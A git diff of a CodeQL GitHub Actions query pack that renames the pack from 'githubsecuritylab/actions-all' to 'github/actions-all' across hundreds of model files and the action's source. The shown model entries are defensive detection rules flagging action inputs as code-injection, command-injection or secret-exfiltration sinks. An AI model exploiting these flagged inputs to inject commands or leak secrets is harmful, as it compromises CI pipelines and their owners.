.../shakacode_react-webpack-rails-tutorial.model.yml | 2 +- .../composite-actions/simple-icons_simple-icons.model.yml | 2 +- .../generated/composite-actions/slint-ui_slint.model.yml | 2 +- 
.../composite-actions/solidusio_solidus.model.yml | 2 +- .../generated/composite-actions/solo-io_gloo.model.yml | 2 +- .../generated/composite-actions/sonarr_sonarr.model.yml | 2 +- .../composite-actions/sonic-pi-net_sonic-pi.model.yml | 2 +- .../composite-actions/spacedriveapp_spacedrive.model.yml | 2 +- .../composite-actions/spockframework_spock.model.yml | 2 +- .../composite-actions/spring-io_initializr.model.yml | 2 +- .../composite-actions/spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- .../spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../composite-actions/square_workflow-kotlin.model.yml | 2 +- .../composite-actions/stefanprodan_podinfo.model.yml | 2 +- .../ext/generated/composite-actions/stellar_go.model.yml | 2 +- .../composite-actions/streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/composite-actions/subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../composite-actions/tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../composite-actions/tensorflow_datasets.model.yml | 2 +- .../composite-actions/texstudio-org_texstudio.model.yml | 2 +- .../composite-actions/toeverything_affine.model.yml | 2 +- .../composite-actions/treeverse_lakefs.model.yml | 2 +- .../composite-actions/trezor_trezor-firmware.model.yml | 2 +- .../generated/composite-actions/tribler_tribler.model.yml | 2 +- .../composite-actions/trunk-io_trunk-action.model.yml | 2 +- .../generated/composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../generated/composite-actions/vercel_turbo.model.yml | 2 +- .../composite-actions/vesoft-inc_nebula.model.yml | 2 +- .../ext/generated/composite-actions/vkcom_vkui.model.yml | 2 +- .../composite-actions/vuetifyjs_vuetify.model.yml | 2 +- 
.../generated/composite-actions/wagoodman_dive.model.yml | 2 +- .../walletconnect_walletconnectswiftv2.model.yml | 2 +- .../ext/generated/composite-actions/wazuh_wazuh.model.yml | 2 +- .../composite-actions/web-infra-dev_rspack.model.yml | 2 +- .../composite-actions/webassembly_wabt.model.yml | 2 +- .../ext/generated/composite-actions/wntrblm_nox.model.yml | 2 +- .../generated/composite-actions/xrplf_rippled.model.yml | 2 +- .../ext/generated/composite-actions/zcash_zcash.model.yml | 2 +- .../generated/composite-actions/zenml-io_zenml.model.yml | 2 +- .../generated/composite-actions/zeroc-ice_ice.model.yml | 2 +- .../reusable-workflows/0xpolygon_polygon-edge.model.yml | 2 +- .../ext/generated/reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../generated/reusable-workflows/adap_flower.model.yml | 2 +- .../reusable-workflows/aio-libs_multidict.model.yml | 2 +- .../generated/reusable-workflows/aio-libs_yarl.model.yml | 2 +- .../reusable-workflows/airbytehq_airbyte.model.yml | 2 +- .../reusable-workflows/alphagov_collections.model.yml | 2 +- .../reusable-workflows/alphagov_frontend.model.yml | 2 +- .../reusable-workflows/alphagov_publishing-api.model.yml | 2 +- .../generated/reusable-workflows/apache_druid.model.yml | 2 +- .../generated/reusable-workflows/apache_flink.model.yml | 2 +- .../generated/reusable-workflows/apache_spark.model.yml | 2 +- .../reusable-workflows/argilla-io_argilla.model.yml | 2 +- .../reusable-workflows/argoproj_argo-cd.model.yml | 2 +- .../reusable-workflows/argoproj_argo-rollouts.model.yml | 2 +- .../reusable-workflows/aws-amplify_amplify-ui.model.yml | 2 +- .../generated/reusable-workflows/azure_apiops.model.yml | 2 +- .../reusable-workflows/azure_mlops-templates.model.yml | 2 +- .../reusable-workflows/bbq-beets_avocaddo-cmw.model.yml | 2 +- .../reusable-workflows/bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- 
.../benc-uk_workflow-dispatch.model.yml | 2 +- .../reusable-workflows/bridgecrewio_checkov.model.yml | 2 +- .../reusable-workflows/bugsnag_bugsnag-ruby.model.yml | 2 +- .../bytecodealliance_wasm-micro-runtime.model.yml | 2 +- .../reusable-workflows/celo-org_celo-blockchain.model.yml | 2 +- .../reusable-workflows/cemu-project_cemu.model.yml | 2 +- .../reusable-workflows/cesiumgs_cesium-unreal.model.yml | 2 +- .../ext/generated/reusable-workflows/cgal_cgal.model.yml | 2 +- .../reusable-workflows/checkstyle_checkstyle.model.yml | 2 +- .../reusable-workflows/chia-network_actions.model.yml | 2 +- .../reusable-workflows/chipsalliance_chisel.model.yml | 2 +- .../reusable-workflows/clickhouse_clickhouse.model.yml | 2 +- .../reusable-workflows/cloudfoundry_cli.model.yml | 2 +- ...loudposse_github-action-matrix-outputs-write.model.yml | 2 +- .../generated/reusable-workflows/cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../reusable-workflows/com-lihaoyi_mill.model.yml | 2 +- .../generated/reusable-workflows/cosmos_ibc-go.model.yml | 2 +- .../reusable-workflows/crowdsecurity_crowdsec.model.yml | 2 +- .../reusable-workflows/cryptomator_cryptomator.model.yml | 2 +- .../reusable-workflows/daeuniverse_dae.model.yml | 2 +- .../reusable-workflows/dafny-lang_dafny.model.yml | 2 +- .../generated/reusable-workflows/dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-go.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-py.model.yml | 2 +- .../reusable-workflows/datafuselabs_databend.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-bigquery.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-core.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-snowflake.model.yml | 2 +- .../reusable-workflows/decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- .../dependencytrack_dependency-track.model.yml | 2 +- 
.../reusable-workflows/devexpress_testcafe.model.yml | 2 +- .../generated/reusable-workflows/dfhack_dfhack.model.yml | 2 +- .../reusable-workflows/docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../reusable-workflows/earthly_earthly.model.yml | 2 +- .../reusable-workflows/eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../reusable-workflows/envoyproxy_envoy.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_bbolt.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../reusable-workflows/eventstore_eventstore.model.yml | 2 +- .../generated/reusable-workflows/expensify_app.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../reusable-workflows/falcosecurity_falco.model.yml | 2 +- .../reusable-workflows/fastify_fastify.model.yml | 2 +- .../reusable-workflows/ferretdb_ferretdb.model.yml | 2 +- .../reusable-workflows/filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../reusable-workflows/flarum_framework.model.yml | 2 +- .../reusable-workflows/fluent_fluent-bit.model.yml | 2 +- .../reusable-workflows/flux-iac_tofu-controller.model.yml | 2 +- .../generated/reusable-workflows/flyteorg_flyte.model.yml | 2 +- .../reusable-workflows/foundatiofx_foundatio.model.yml | 2 +- .../reusable-workflows/freecad_freecad.model.yml | 2 +- .../reusable-workflows/getpelican_pelican.model.yml | 2 +- .../reusable-workflows/getporter_porter.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-dart.model.yml | 2 +- .../reusable-workflows/getsentry_sentry-unity.model.yml | 2 +- .../reusable-workflows/gitpod-io_gitpod.model.yml | 2 +- .../reusable-workflows/gittools_gitversion.model.yml | 2 +- 
.../googlecloudplatform_magic-modules.model.yml | 2 +- .../googlecloudplatform_nodejs-docs-samples.model.yml | 2 +- .../reusable-workflows/gravitational_teleport.model.yml | 2 +- .../reusable-workflows/gravitl_netmaker.model.yml | 2 +- .../ext/generated/reusable-workflows/h2oai_wave.model.yml | 2 +- .../reusable-workflows/hadashia_vcontainer.model.yml | 2 +- .../hashgraph_hedera-services.model.yml | 2 +- .../reusable-workflows/hashicorp_boundary.model.yml | 2 +- .../reusable-workflows/hashicorp_consul.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform-cdk.model.yml | 2 +- .../hashicorp_terraform-provider-tfe.model.yml | 2 +- .../reusable-workflows/hashicorp_terraform.model.yml | 2 +- .../reusable-workflows/hashicorp_vault.model.yml | 4 ++-- .../ext/generated/reusable-workflows/heroku_cli.model.yml | 2 +- .../reusable-workflows/hitobito_hitobito.model.yml | 4 ++-- .../home-assistant_operating-system.model.yml | 2 +- .../homuler_mediapipeunityplugin.model.yml | 2 +- .../reusable-workflows/huggingface_doc-builder.model.yml | 2 +- .../reusable-workflows/huggingface_transformers.model.yml | 2 +- .../hyperion-project_hyperion.ng.model.yml | 2 +- .../ext/generated/reusable-workflows/ibm_sarama.model.yml | 2 +- ...d-photos-downloader_icloud_photos_downloader.model.yml | 2 +- .../reusable-workflows/immich-app_immich.model.yml | 2 +- .../generated/reusable-workflows/inria_spoon.model.yml | 2 +- .../intel_intel-device-plugins-for-kubernetes.model.yml | 2 +- .../reusable-workflows/inverse-inc_packetfence.model.yml | 2 +- .../ext/generated/reusable-workflows/ispc_ispc.model.yml | 2 +- .../jetbrains_intellij-platform-gradle-plugin.model.yml | 2 +- .../reusable-workflows/jupyter_docker-stacks.model.yml | 2 +- .../reusable-workflows/kairos-io_kairos.model.yml | 2 +- .../generated/reusable-workflows/kanidm_kanidm.model.yml | 2 +- .../kata-containers_kata-containers.model.yml | 2 +- .../generated/reusable-workflows/kiali_kiali.model.yml | 2 +- 
.../generated/reusable-workflows/kotest_kotest.model.yml | 2 +- .../reusable-workflows/kubernetes_ingress-nginx.model.yml | 2 +- .../reusable-workflows/kubescape_kubescape.model.yml | 2 +- .../reusable-workflows/kubeshop_botkube.model.yml | 4 ++-- .../generated/reusable-workflows/kumahq_kuma.model.yml | 2 +- .../generated/reusable-workflows/labring_sealos.model.yml | 2 +- .../reusable-workflows/laion-ai_open-assistant.model.yml | 2 +- .../reusable-workflows/learningequality_kolibri.model.yml | 2 +- .../reusable-workflows/lensesio_stream-reactor.model.yml | 2 +- .../reusable-workflows/leptos-rs_leptos.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../reusable-workflows/liquibase_liquibase.model.yml | 2 +- .../reusable-workflows/litestar-org_litestar.model.yml | 2 +- .../ext/generated/reusable-workflows/llvm_circt.model.yml | 2 +- .../generated/reusable-workflows/lnbits_lnbits.model.yml | 2 +- .../generated/reusable-workflows/lutris_lutris.model.yml | 2 +- .../generated/reusable-workflows/mailu_mailu.model.yml | 2 +- .../reusable-workflows/mamba-org_mamba.model.yml | 2 +- .../manticoresoftware_manticoresearch.model.yml | 2 +- .../reusable-workflows/marcelotduarte_cx_freeze.model.yml | 2 +- ...rialdesigninxaml_materialdesigninxamltoolkit.model.yml | 2 +- .../reusable-workflows/matter-labs_zksync-era.model.yml | 2 +- .../reusable-workflows/mattermost_desktop.model.yml | 2 +- .../reusable-workflows/mattermost_mattermost.model.yml | 2 +- .../reusable-workflows/mealie-recipes_mealie.model.yml | 2 +- .../reusable-workflows/meshery_meshery.model.yml | 2 +- .../reusable-workflows/meshtastic_firmware.model.yml | 2 +- .../reusable-workflows/microcks_microcks.model.yml | 2 +- .../microsoft_applicationinsights-java.model.yml | 2 +- .../reusable-workflows/microsoft_chat-copilot.model.yml | 2 +- .../reusable-workflows/microsoft_msquic.model.yml | 2 +- .../generated/reusable-workflows/microsoft_oryx.model.yml | 2 +- 
.../reusable-workflows/microsoft_pr-metrics.model.yml | 2 +- .../microsoft_react-native-windows-samples.model.yml | 2 +- .../microsoft_vscode-cpptools.model.yml | 2 +- .../generated/reusable-workflows/moby_buildkit.model.yml | 2 +- .../ext/generated/reusable-workflows/moby_moby.model.yml | 2 +- .../reusable-workflows/mosaicml_composer.model.yml | 2 +- .../reusable-workflows/msys2_setup-msys2.model.yml | 2 +- .../generated/reusable-workflows/mudler_localai.model.yml | 2 +- .../reusable-workflows/mustardchef_wsabuilds.model.yml | 2 +- .../ext/generated/reusable-workflows/n8n-io_n8n.model.yml | 2 +- .../generated/reusable-workflows/napari_napari.model.yml | 2 +- .../generated/reusable-workflows/nasa_fprime.model.yml | 2 +- .../reusable-workflows/nautobot_nautobot.model.yml | 2 +- .../ext/generated/reusable-workflows/nektos_act.model.yml | 2 +- .../reusable-workflows/neondatabase_neon.model.yml | 2 +- .../generated/reusable-workflows/neovim_neovim.model.yml | 2 +- .../reusable-workflows/nethermindeth_nethermind.model.yml | 2 +- .../newrelic_newrelic-dotnet-agent.model.yml | 2 +- .../newrelic_newrelic-java-agent.model.yml | 2 +- .../reusable-workflows/newrelic_node-newrelic.model.yml | 2 +- .../reusable-workflows/nexus-mods_nexusmods.app.model.yml | 2 +- .../nginxinc_kubernetes-ingress.model.yml | 2 +- .../generated/reusable-workflows/nocodb_nocodb.model.yml | 2 +- .../generated/reusable-workflows/novuhq_novu.model.yml | 2 +- .../generated/reusable-workflows/npm_abbrev-js.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_cli.model.yml | 2 +- .../reusable-workflows/npm_fs-minipass.model.yml | 2 +- .../reusable-workflows/npm_hosted-git-info.model.yml | 2 +- ql/lib/ext/generated/reusable-workflows/npm_ini.model.yml | 2 +- .../npm_json-parse-even-better-errors.model.yml | 2 +- .../npm_minify-registry-metadata.model.yml | 2 +- .../reusable-workflows/npm_mute-stream.model.yml | 2 +- .../reusable-workflows/npm_node-semver.model.yml | 2 +- 
.../generated/reusable-workflows/npm_node-which.model.yml | 2 +- .../ext/generated/reusable-workflows/npm_nopt.model.yml | 2 +- .../npm_normalize-package-data.model.yml | 2 +- .../reusable-workflows/npm_write-file-atomic.model.yml | 2 +- .../generated/reusable-workflows/onflow_cadence.model.yml | 2 +- .../reusable-workflows/open-goal_jak-project.model.yml | 2 +- .../open-telemetry_opentelemetry-demo.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-dotnet.model.yml | 2 +- ...telemetry_opentelemetry-java-instrumentation.model.yml | 2 +- .../open-telemetry_opentelemetry-js-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-operator.model.yml | 2 +- .../reusable-workflows/openbao_openbao.model.yml | 2 +- .../reusable-workflows/openhab_openhab-docs.model.yml | 2 +- .../reusable-workflows/openmined_pysyft.model.yml | 2 +- .../reusable-workflows/opentofu_opentofu.model.yml | 2 +- .../reusable-workflows/openttd_openttd.model.yml | 2 +- .../reusable-workflows/openvinotoolkit_openvino.model.yml | 2 +- .../generated/reusable-workflows/openxla_iree.model.yml | 2 +- .../generated/reusable-workflows/openzfs_zfs.model.yml | 2 +- .../operator-framework_java-operator-sdk.model.yml | 2 +- .../reusable-workflows/orange-opensource_hurl.model.yml | 2 +- .../paolosalvatori_servicebusexplorer.model.yml | 2 +- .../reusable-workflows/parcel-bundler_parcel.model.yml | 2 +- .../reusable-workflows/pardeike_harmony.model.yml | 2 +- .../generated/reusable-workflows/pcsx2_pcsx2.model.yml | 2 +- .../reusable-workflows/pennylaneai_pennylane.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/reusable-workflows/pixie-io_pixie.model.yml | 2 +- .../reusable-workflows/plantuml_plantuml.model.yml | 2 +- .../generated/reusable-workflows/powerdns_pdns.model.yml | 2 +- .../reusable-workflows/preactjs_preact.model.yml | 2 +- .../prismlauncher_prismlauncher.model.yml | 2 +- 
.../reusable-workflows/product-os_flowzone.model.yml | 2 +- .../reusable-workflows/project-oak_oak.model.yml | 2 +- .../ext/generated/reusable-workflows/prql_prql.model.yml | 2 +- .../generated/reusable-workflows/pulumi_pulumi.model.yml | 2 +- .../reusable-workflows/puppeteer_puppeteer.model.yml | 2 +- .../puppetlabs_puppetlabs-puppetdb.model.yml | 2 +- .../generated/reusable-workflows/pyo3_maturin.model.yml | 2 +- .../ext/generated/reusable-workflows/pyo3_pyo3.model.yml | 2 +- .../generated/reusable-workflows/python_cpython.model.yml | 2 +- .../reusable-workflows/pytorch_botorch.model.yml | 2 +- .../generated/reusable-workflows/pytorch_xla.model.yml | 2 +- .../reusable-workflows/quarto-dev_quarto-cli.model.yml | 2 +- .../reusable-workflows/rancher_dashboard.model.yml | 2 +- .../reusable-workflows/rasterio_rasterio.model.yml | 2 +- .../reusable-workflows/redisearch_redisearch.model.yml | 2 +- .../reusable-workflows/remix-run_remix.model.yml | 2 +- .../reusable-workflows/rmcrackan_libation.model.yml | 2 +- .../reusable-workflows/rocketchat_rocket.chat.model.yml | 2 +- .../generated/reusable-workflows/ruby_ruby.wasm.model.yml | 2 +- .../reusable-workflows/rustdesk_rustdesk.model.yml | 2 +- .../reusable-workflows/saadeghi_daisyui.model.yml | 2 +- .../generated/reusable-workflows/sagemath_sage.model.yml | 2 +- .../reusable-workflows/schemastore_schemastore.model.yml | 2 +- .../scikit-learn_scikit-learn.model.yml | 2 +- .../reusable-workflows/seleniumhq_selenium.model.yml | 2 +- .../shaka-project_shaka-packager.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../reusable-workflows/shimataro_ssh-key-action.model.yml | 2 +- .../reusable-workflows/softfever_orcaslicer.model.yml | 2 +- .../software-mansion_react-native-reanimated.model.yml | 2 +- .../reusable-workflows/solana-labs_solana.model.yml | 2 +- .../generated/reusable-workflows/sonarr_sonarr.model.yml | 2 +- .../reusable-workflows/speedb-io_speedb.model.yml | 2 +- 
.../spring-cloud_spring-cloud-dataflow.model.yml | 2 +- .../reusable-workflows/sqlfluff_sqlfluff.model.yml | 2 +- .../reusable-workflows/stdlib-js_stdlib.model.yml | 2 +- .../reusable-workflows/stereokit_stereokit.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/reusable-workflows/supabase_auth.model.yml | 2 +- .../generated/reusable-workflows/supabase_cli.model.yml | 2 +- .../generated/reusable-workflows/tencent_hippy.model.yml | 4 ++-- .../reusable-workflows/tgstation_tgstation.model.yml | 2 +- .../reusable-workflows/thesofproject_sof.model.yml | 2 +- .../generated/reusable-workflows/tiann_kernelsu.model.yml | 2 +- .../reusable-workflows/tiledb-inc_tiledb.model.yml | 2 +- .../reusable-workflows/toeverything_affine.model.yml | 2 +- .../generated/reusable-workflows/tracel-ai_burn.model.yml | 2 +- .../reusable-workflows/tribler_tribler.model.yml | 2 +- .../reusable-workflows/ubisoft_sharpmake.model.yml | 2 +- .../unity-technologies_ml-agents.model.yml | 2 +- .../generated/reusable-workflows/urbit_urbit.model.yml | 2 +- .../reusable-workflows/uyuni-project_uyuni.model.yml | 2 +- .../reusable-workflows/vert-x3_vertx-hazelcast.model.yml | 2 +- .../ext/generated/reusable-workflows/vkcom_vkui.model.yml | 2 +- .../reusable-workflows/walletconnect_web3modal.model.yml | 2 +- .../reusable-workflows/warzone2100_warzone2100.model.yml | 2 +- .../reusable-workflows/wasmedge_wasmedge.model.yml | 2 +- .../reusable-workflows/web-infra-dev_rspack.model.yml | 2 +- .../ext/generated/reusable-workflows/werf_werf.model.yml | 2 +- .../reusable-workflows/widdix_aws-cf-templates.model.yml | 2 +- .../reusable-workflows/wildfly_wildfly.model.yml | 2 +- .../generated/reusable-workflows/yt-dlp_yt-dlp.model.yml | 2 +- .../generated/reusable-workflows/zenml-io_zenml.model.yml | 2 +- .../zephyrproject-rtos_zephyr.model.yml | 2 +- .../reusable-workflows/zitadel_zitadel.model.yml | 4 ++-- ql/lib/ext/getsentry_action-release.model.yml | 2 +- 
ql/lib/ext/github_codeql-action.model.yml | 2 +- ql/lib/ext/go-semantic-release_action.model.yml | 2 +- ql/lib/ext/golangci_golangci-lint-action.model.yml | 2 +- ql/lib/ext/gonuit_heroku-docker-deploy.model.yml | 2 +- ql/lib/ext/goreleaser_goreleaser-action.model.yml | 2 +- .../gr2m_create-or-update-pull-request-action.model.yml | 2 +- ql/lib/ext/gradle_gradle-build-action.model.yml | 2 +- ql/lib/ext/haya14busa_action-cond.model.yml | 2 +- ql/lib/ext/hexlet_project-action.model.yml | 2 +- ql/lib/ext/ilammy_msvc-dev-cmd.model.yml | 2 +- ql/lib/ext/ilammy_setup-nasm.model.yml | 2 +- ql/lib/ext/imjohnbo_issue-bot.model.yml | 2 +- ql/lib/ext/iterative_setup-cml.model.yml | 2 +- ql/lib/ext/iterative_setup-dvc.model.yml | 2 +- ql/lib/ext/jamesives_github-pages-deploy-action.model.yml | 2 +- ql/lib/ext/jitterbit_get-changed-files.model.yml | 2 +- ql/lib/ext/johnnymorganz_stylua-action.model.yml | 2 +- ql/lib/ext/jsdaniell_create-json.model.yml | 2 +- ql/lib/ext/jurplel_install-qt-action.model.yml | 2 +- ql/lib/ext/jwalton_gh-ecr-push.model.yml | 4 ++-- ql/lib/ext/khan_pull-request-comment-trigger.model.yml | 2 +- ...arsoner_circleci-artifacts-redirector-action.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-lua.model.yml | 2 +- ql/lib/ext/leafo_gh-actions-luarocks.model.yml | 2 +- ql/lib/ext/lucasbento_auto-close-issues.model.yml | 2 +- .../ext/mad9000_actions-find-and-replace-string.model.yml | 2 +- ql/lib/ext/magefile_mage-action.model.yml | 2 +- ql/lib/ext/maierj_fastlane-action.model.yml | 2 +- ql/lib/ext/manusa_actions-setup-minikube.model.yml | 2 +- ql/lib/ext/marocchino_on_artifact.model.yml | 2 +- ql/lib/ext/mattdavis0351_actions.model.yml | 4 ++-- ql/lib/ext/meteorengineer_setup-meteor.model.yml | 2 +- ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml | 2 +- ql/lib/ext/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/mishakav_pytest-coverage-comment.model.yml | 2 +- .../ext/mr-smithers-excellent_docker-build-push.model.yml | 2 +- 
ql/lib/ext/msys2_setup-msys2.model.yml | 2 +- ql/lib/ext/mxschmitt_action-tmate.model.yml | 2 +- ql/lib/ext/mymindstorm_setup-emsdk.model.yml | 4 ++-- ql/lib/ext/nanasess_setup-chromedriver.model.yml | 2 +- ql/lib/ext/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/nick-fields_retry.model.yml | 2 +- ql/lib/ext/octokit_graphql-action.model.yml | 2 +- ql/lib/ext/octokit_request-action.model.yml | 2 +- ql/lib/ext/olafurpg_setup-scala.model.yml | 2 +- ql/lib/ext/paambaati_codeclimate-action.model.yml | 2 +- ql/lib/ext/peter-evans_create-pull-request.model.yml | 2 +- .../ext/peter-murray_issue-body-parser-action.model.yml | 2 +- ql/lib/ext/plasmicapp_plasmic-action.model.yml | 2 +- ql/lib/ext/preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/py-actions_flake8.model.yml | 2 +- ql/lib/ext/py-actions_py-dependency-install.model.yml | 2 +- ql/lib/ext/pyo3_maturin-action.model.yml | 2 +- .../ext/reactivecircus_android-emulator-runner.model.yml | 2 +- .../redhat-plumbers-in-action_download-artifact.model.yml | 2 +- ql/lib/ext/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/renovatebot_github-action.model.yml | 2 +- ql/lib/ext/roots_issue-closer-action.model.yml | 2 +- ql/lib/ext/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/ruby_setup-ruby.model.yml | 4 ++-- .../salsify_action-detect-and-tag-new-version.model.yml | 4 ++-- ql/lib/ext/sergeysova_jq-action.model.yml | 2 +- ql/lib/ext/shallwefootball_upload-s3-action.model.yml | 2 +- ql/lib/ext/shogo82148_actions-setup-perl.model.yml | 2 +- ql/lib/ext/skitionek_notify-microsoft-teams.model.yml | 2 +- ql/lib/ext/snow-actions_eclint.model.yml | 2 +- ql/lib/ext/stackhawk_hawkscan-action.model.yml | 2 +- ql/lib/ext/step-security_harden-runner.model.yml | 2 +- ql/lib/ext/suisei-cn_actions-download-file.model.yml | 2 +- ql/lib/ext/tibdex_backport.model.yml | 2 +- ql/lib/ext/timheuer_base64-to-file.model.yml | 2 +- ql/lib/ext/tj-actions_branch-names.model.yml | 2 +- ql/lib/ext/trilom_file-changes-action.model.yml | 2 +- 
ql/lib/ext/tripss_conventional-changelog-action.model.yml | 2 +- ql/lib/ext/tryghost_action-deploy-theme.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- ql/lib/ext/veracode_veracode-sca.model.yml | 2 +- ql/lib/ext/wearerequired_lint-action.model.yml | 2 +- ql/lib/ext/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/workflow-models/workflow-models.yml | 8 ++++---- ql/lib/ext/xt0rted_slash-command-action.model.yml | 2 +- ql/lib/ext/zaproxy_action-baseline.model.yml | 2 +- ql/lib/ext/zaproxy_action-full-scan.model.yml | 2 +- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 4 ++-- ql/test/qlpack.yml | 6 +++--- 748 files changed, 777 insertions(+), 777 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 7bb3039fe48..7281eb9d9b5 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28606,7 +28606,7 @@ async function newCodeQL() { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 08c4b420a4c..5b06b007d8a 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -26,7 +26,7 @@ export async function newCodeQL(): Promise { return { language: "javascript", path: await findCodeQL(), - pack: "githubsecuritylab/actions-queries", + pack: "github/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, source_root: core.getInput("source-root"), output: core.getInput("sarif"), diff --git a/ql/lib/ext/8398a7_action-slack.model.yml b/ql/lib/ext/8398a7_action-slack.model.yml index b897e8f2c5a..5687a9729fc 100644 --- a/ql/lib/ext/8398a7_action-slack.model.yml +++ b/ql/lib/ext/8398a7_action-slack.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
index 3a5b34880b9..87620afac70 100644
--- a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
+++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
diff --git a/ql/lib/ext/actions_github-script.model.yml b/ql/lib/ext/actions_github-script.model.yml
index 20abd532872..f02d8f5b180 100644
--- a/ql/lib/ext/actions_github-script.model.yml
+++ b/ql/lib/ext/actions_github-script.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
index dcc20433483..77df62717b0 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
index 3afd9991e07..abdcdd6d698 100644
--- a/ql/lib/ext/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/akhileshns_heroku-deploy.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
index 3deae2a9f19..ecfdbfb98a0 100644
--- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/ql/lib/ext/anchore_sbom-action.model.yml b/ql/lib/ext/anchore_sbom-action.model.yml
index 7dd0459ab7f..ea7ab312528 100644
--- a/ql/lib/ext/anchore_sbom-action.model.yml
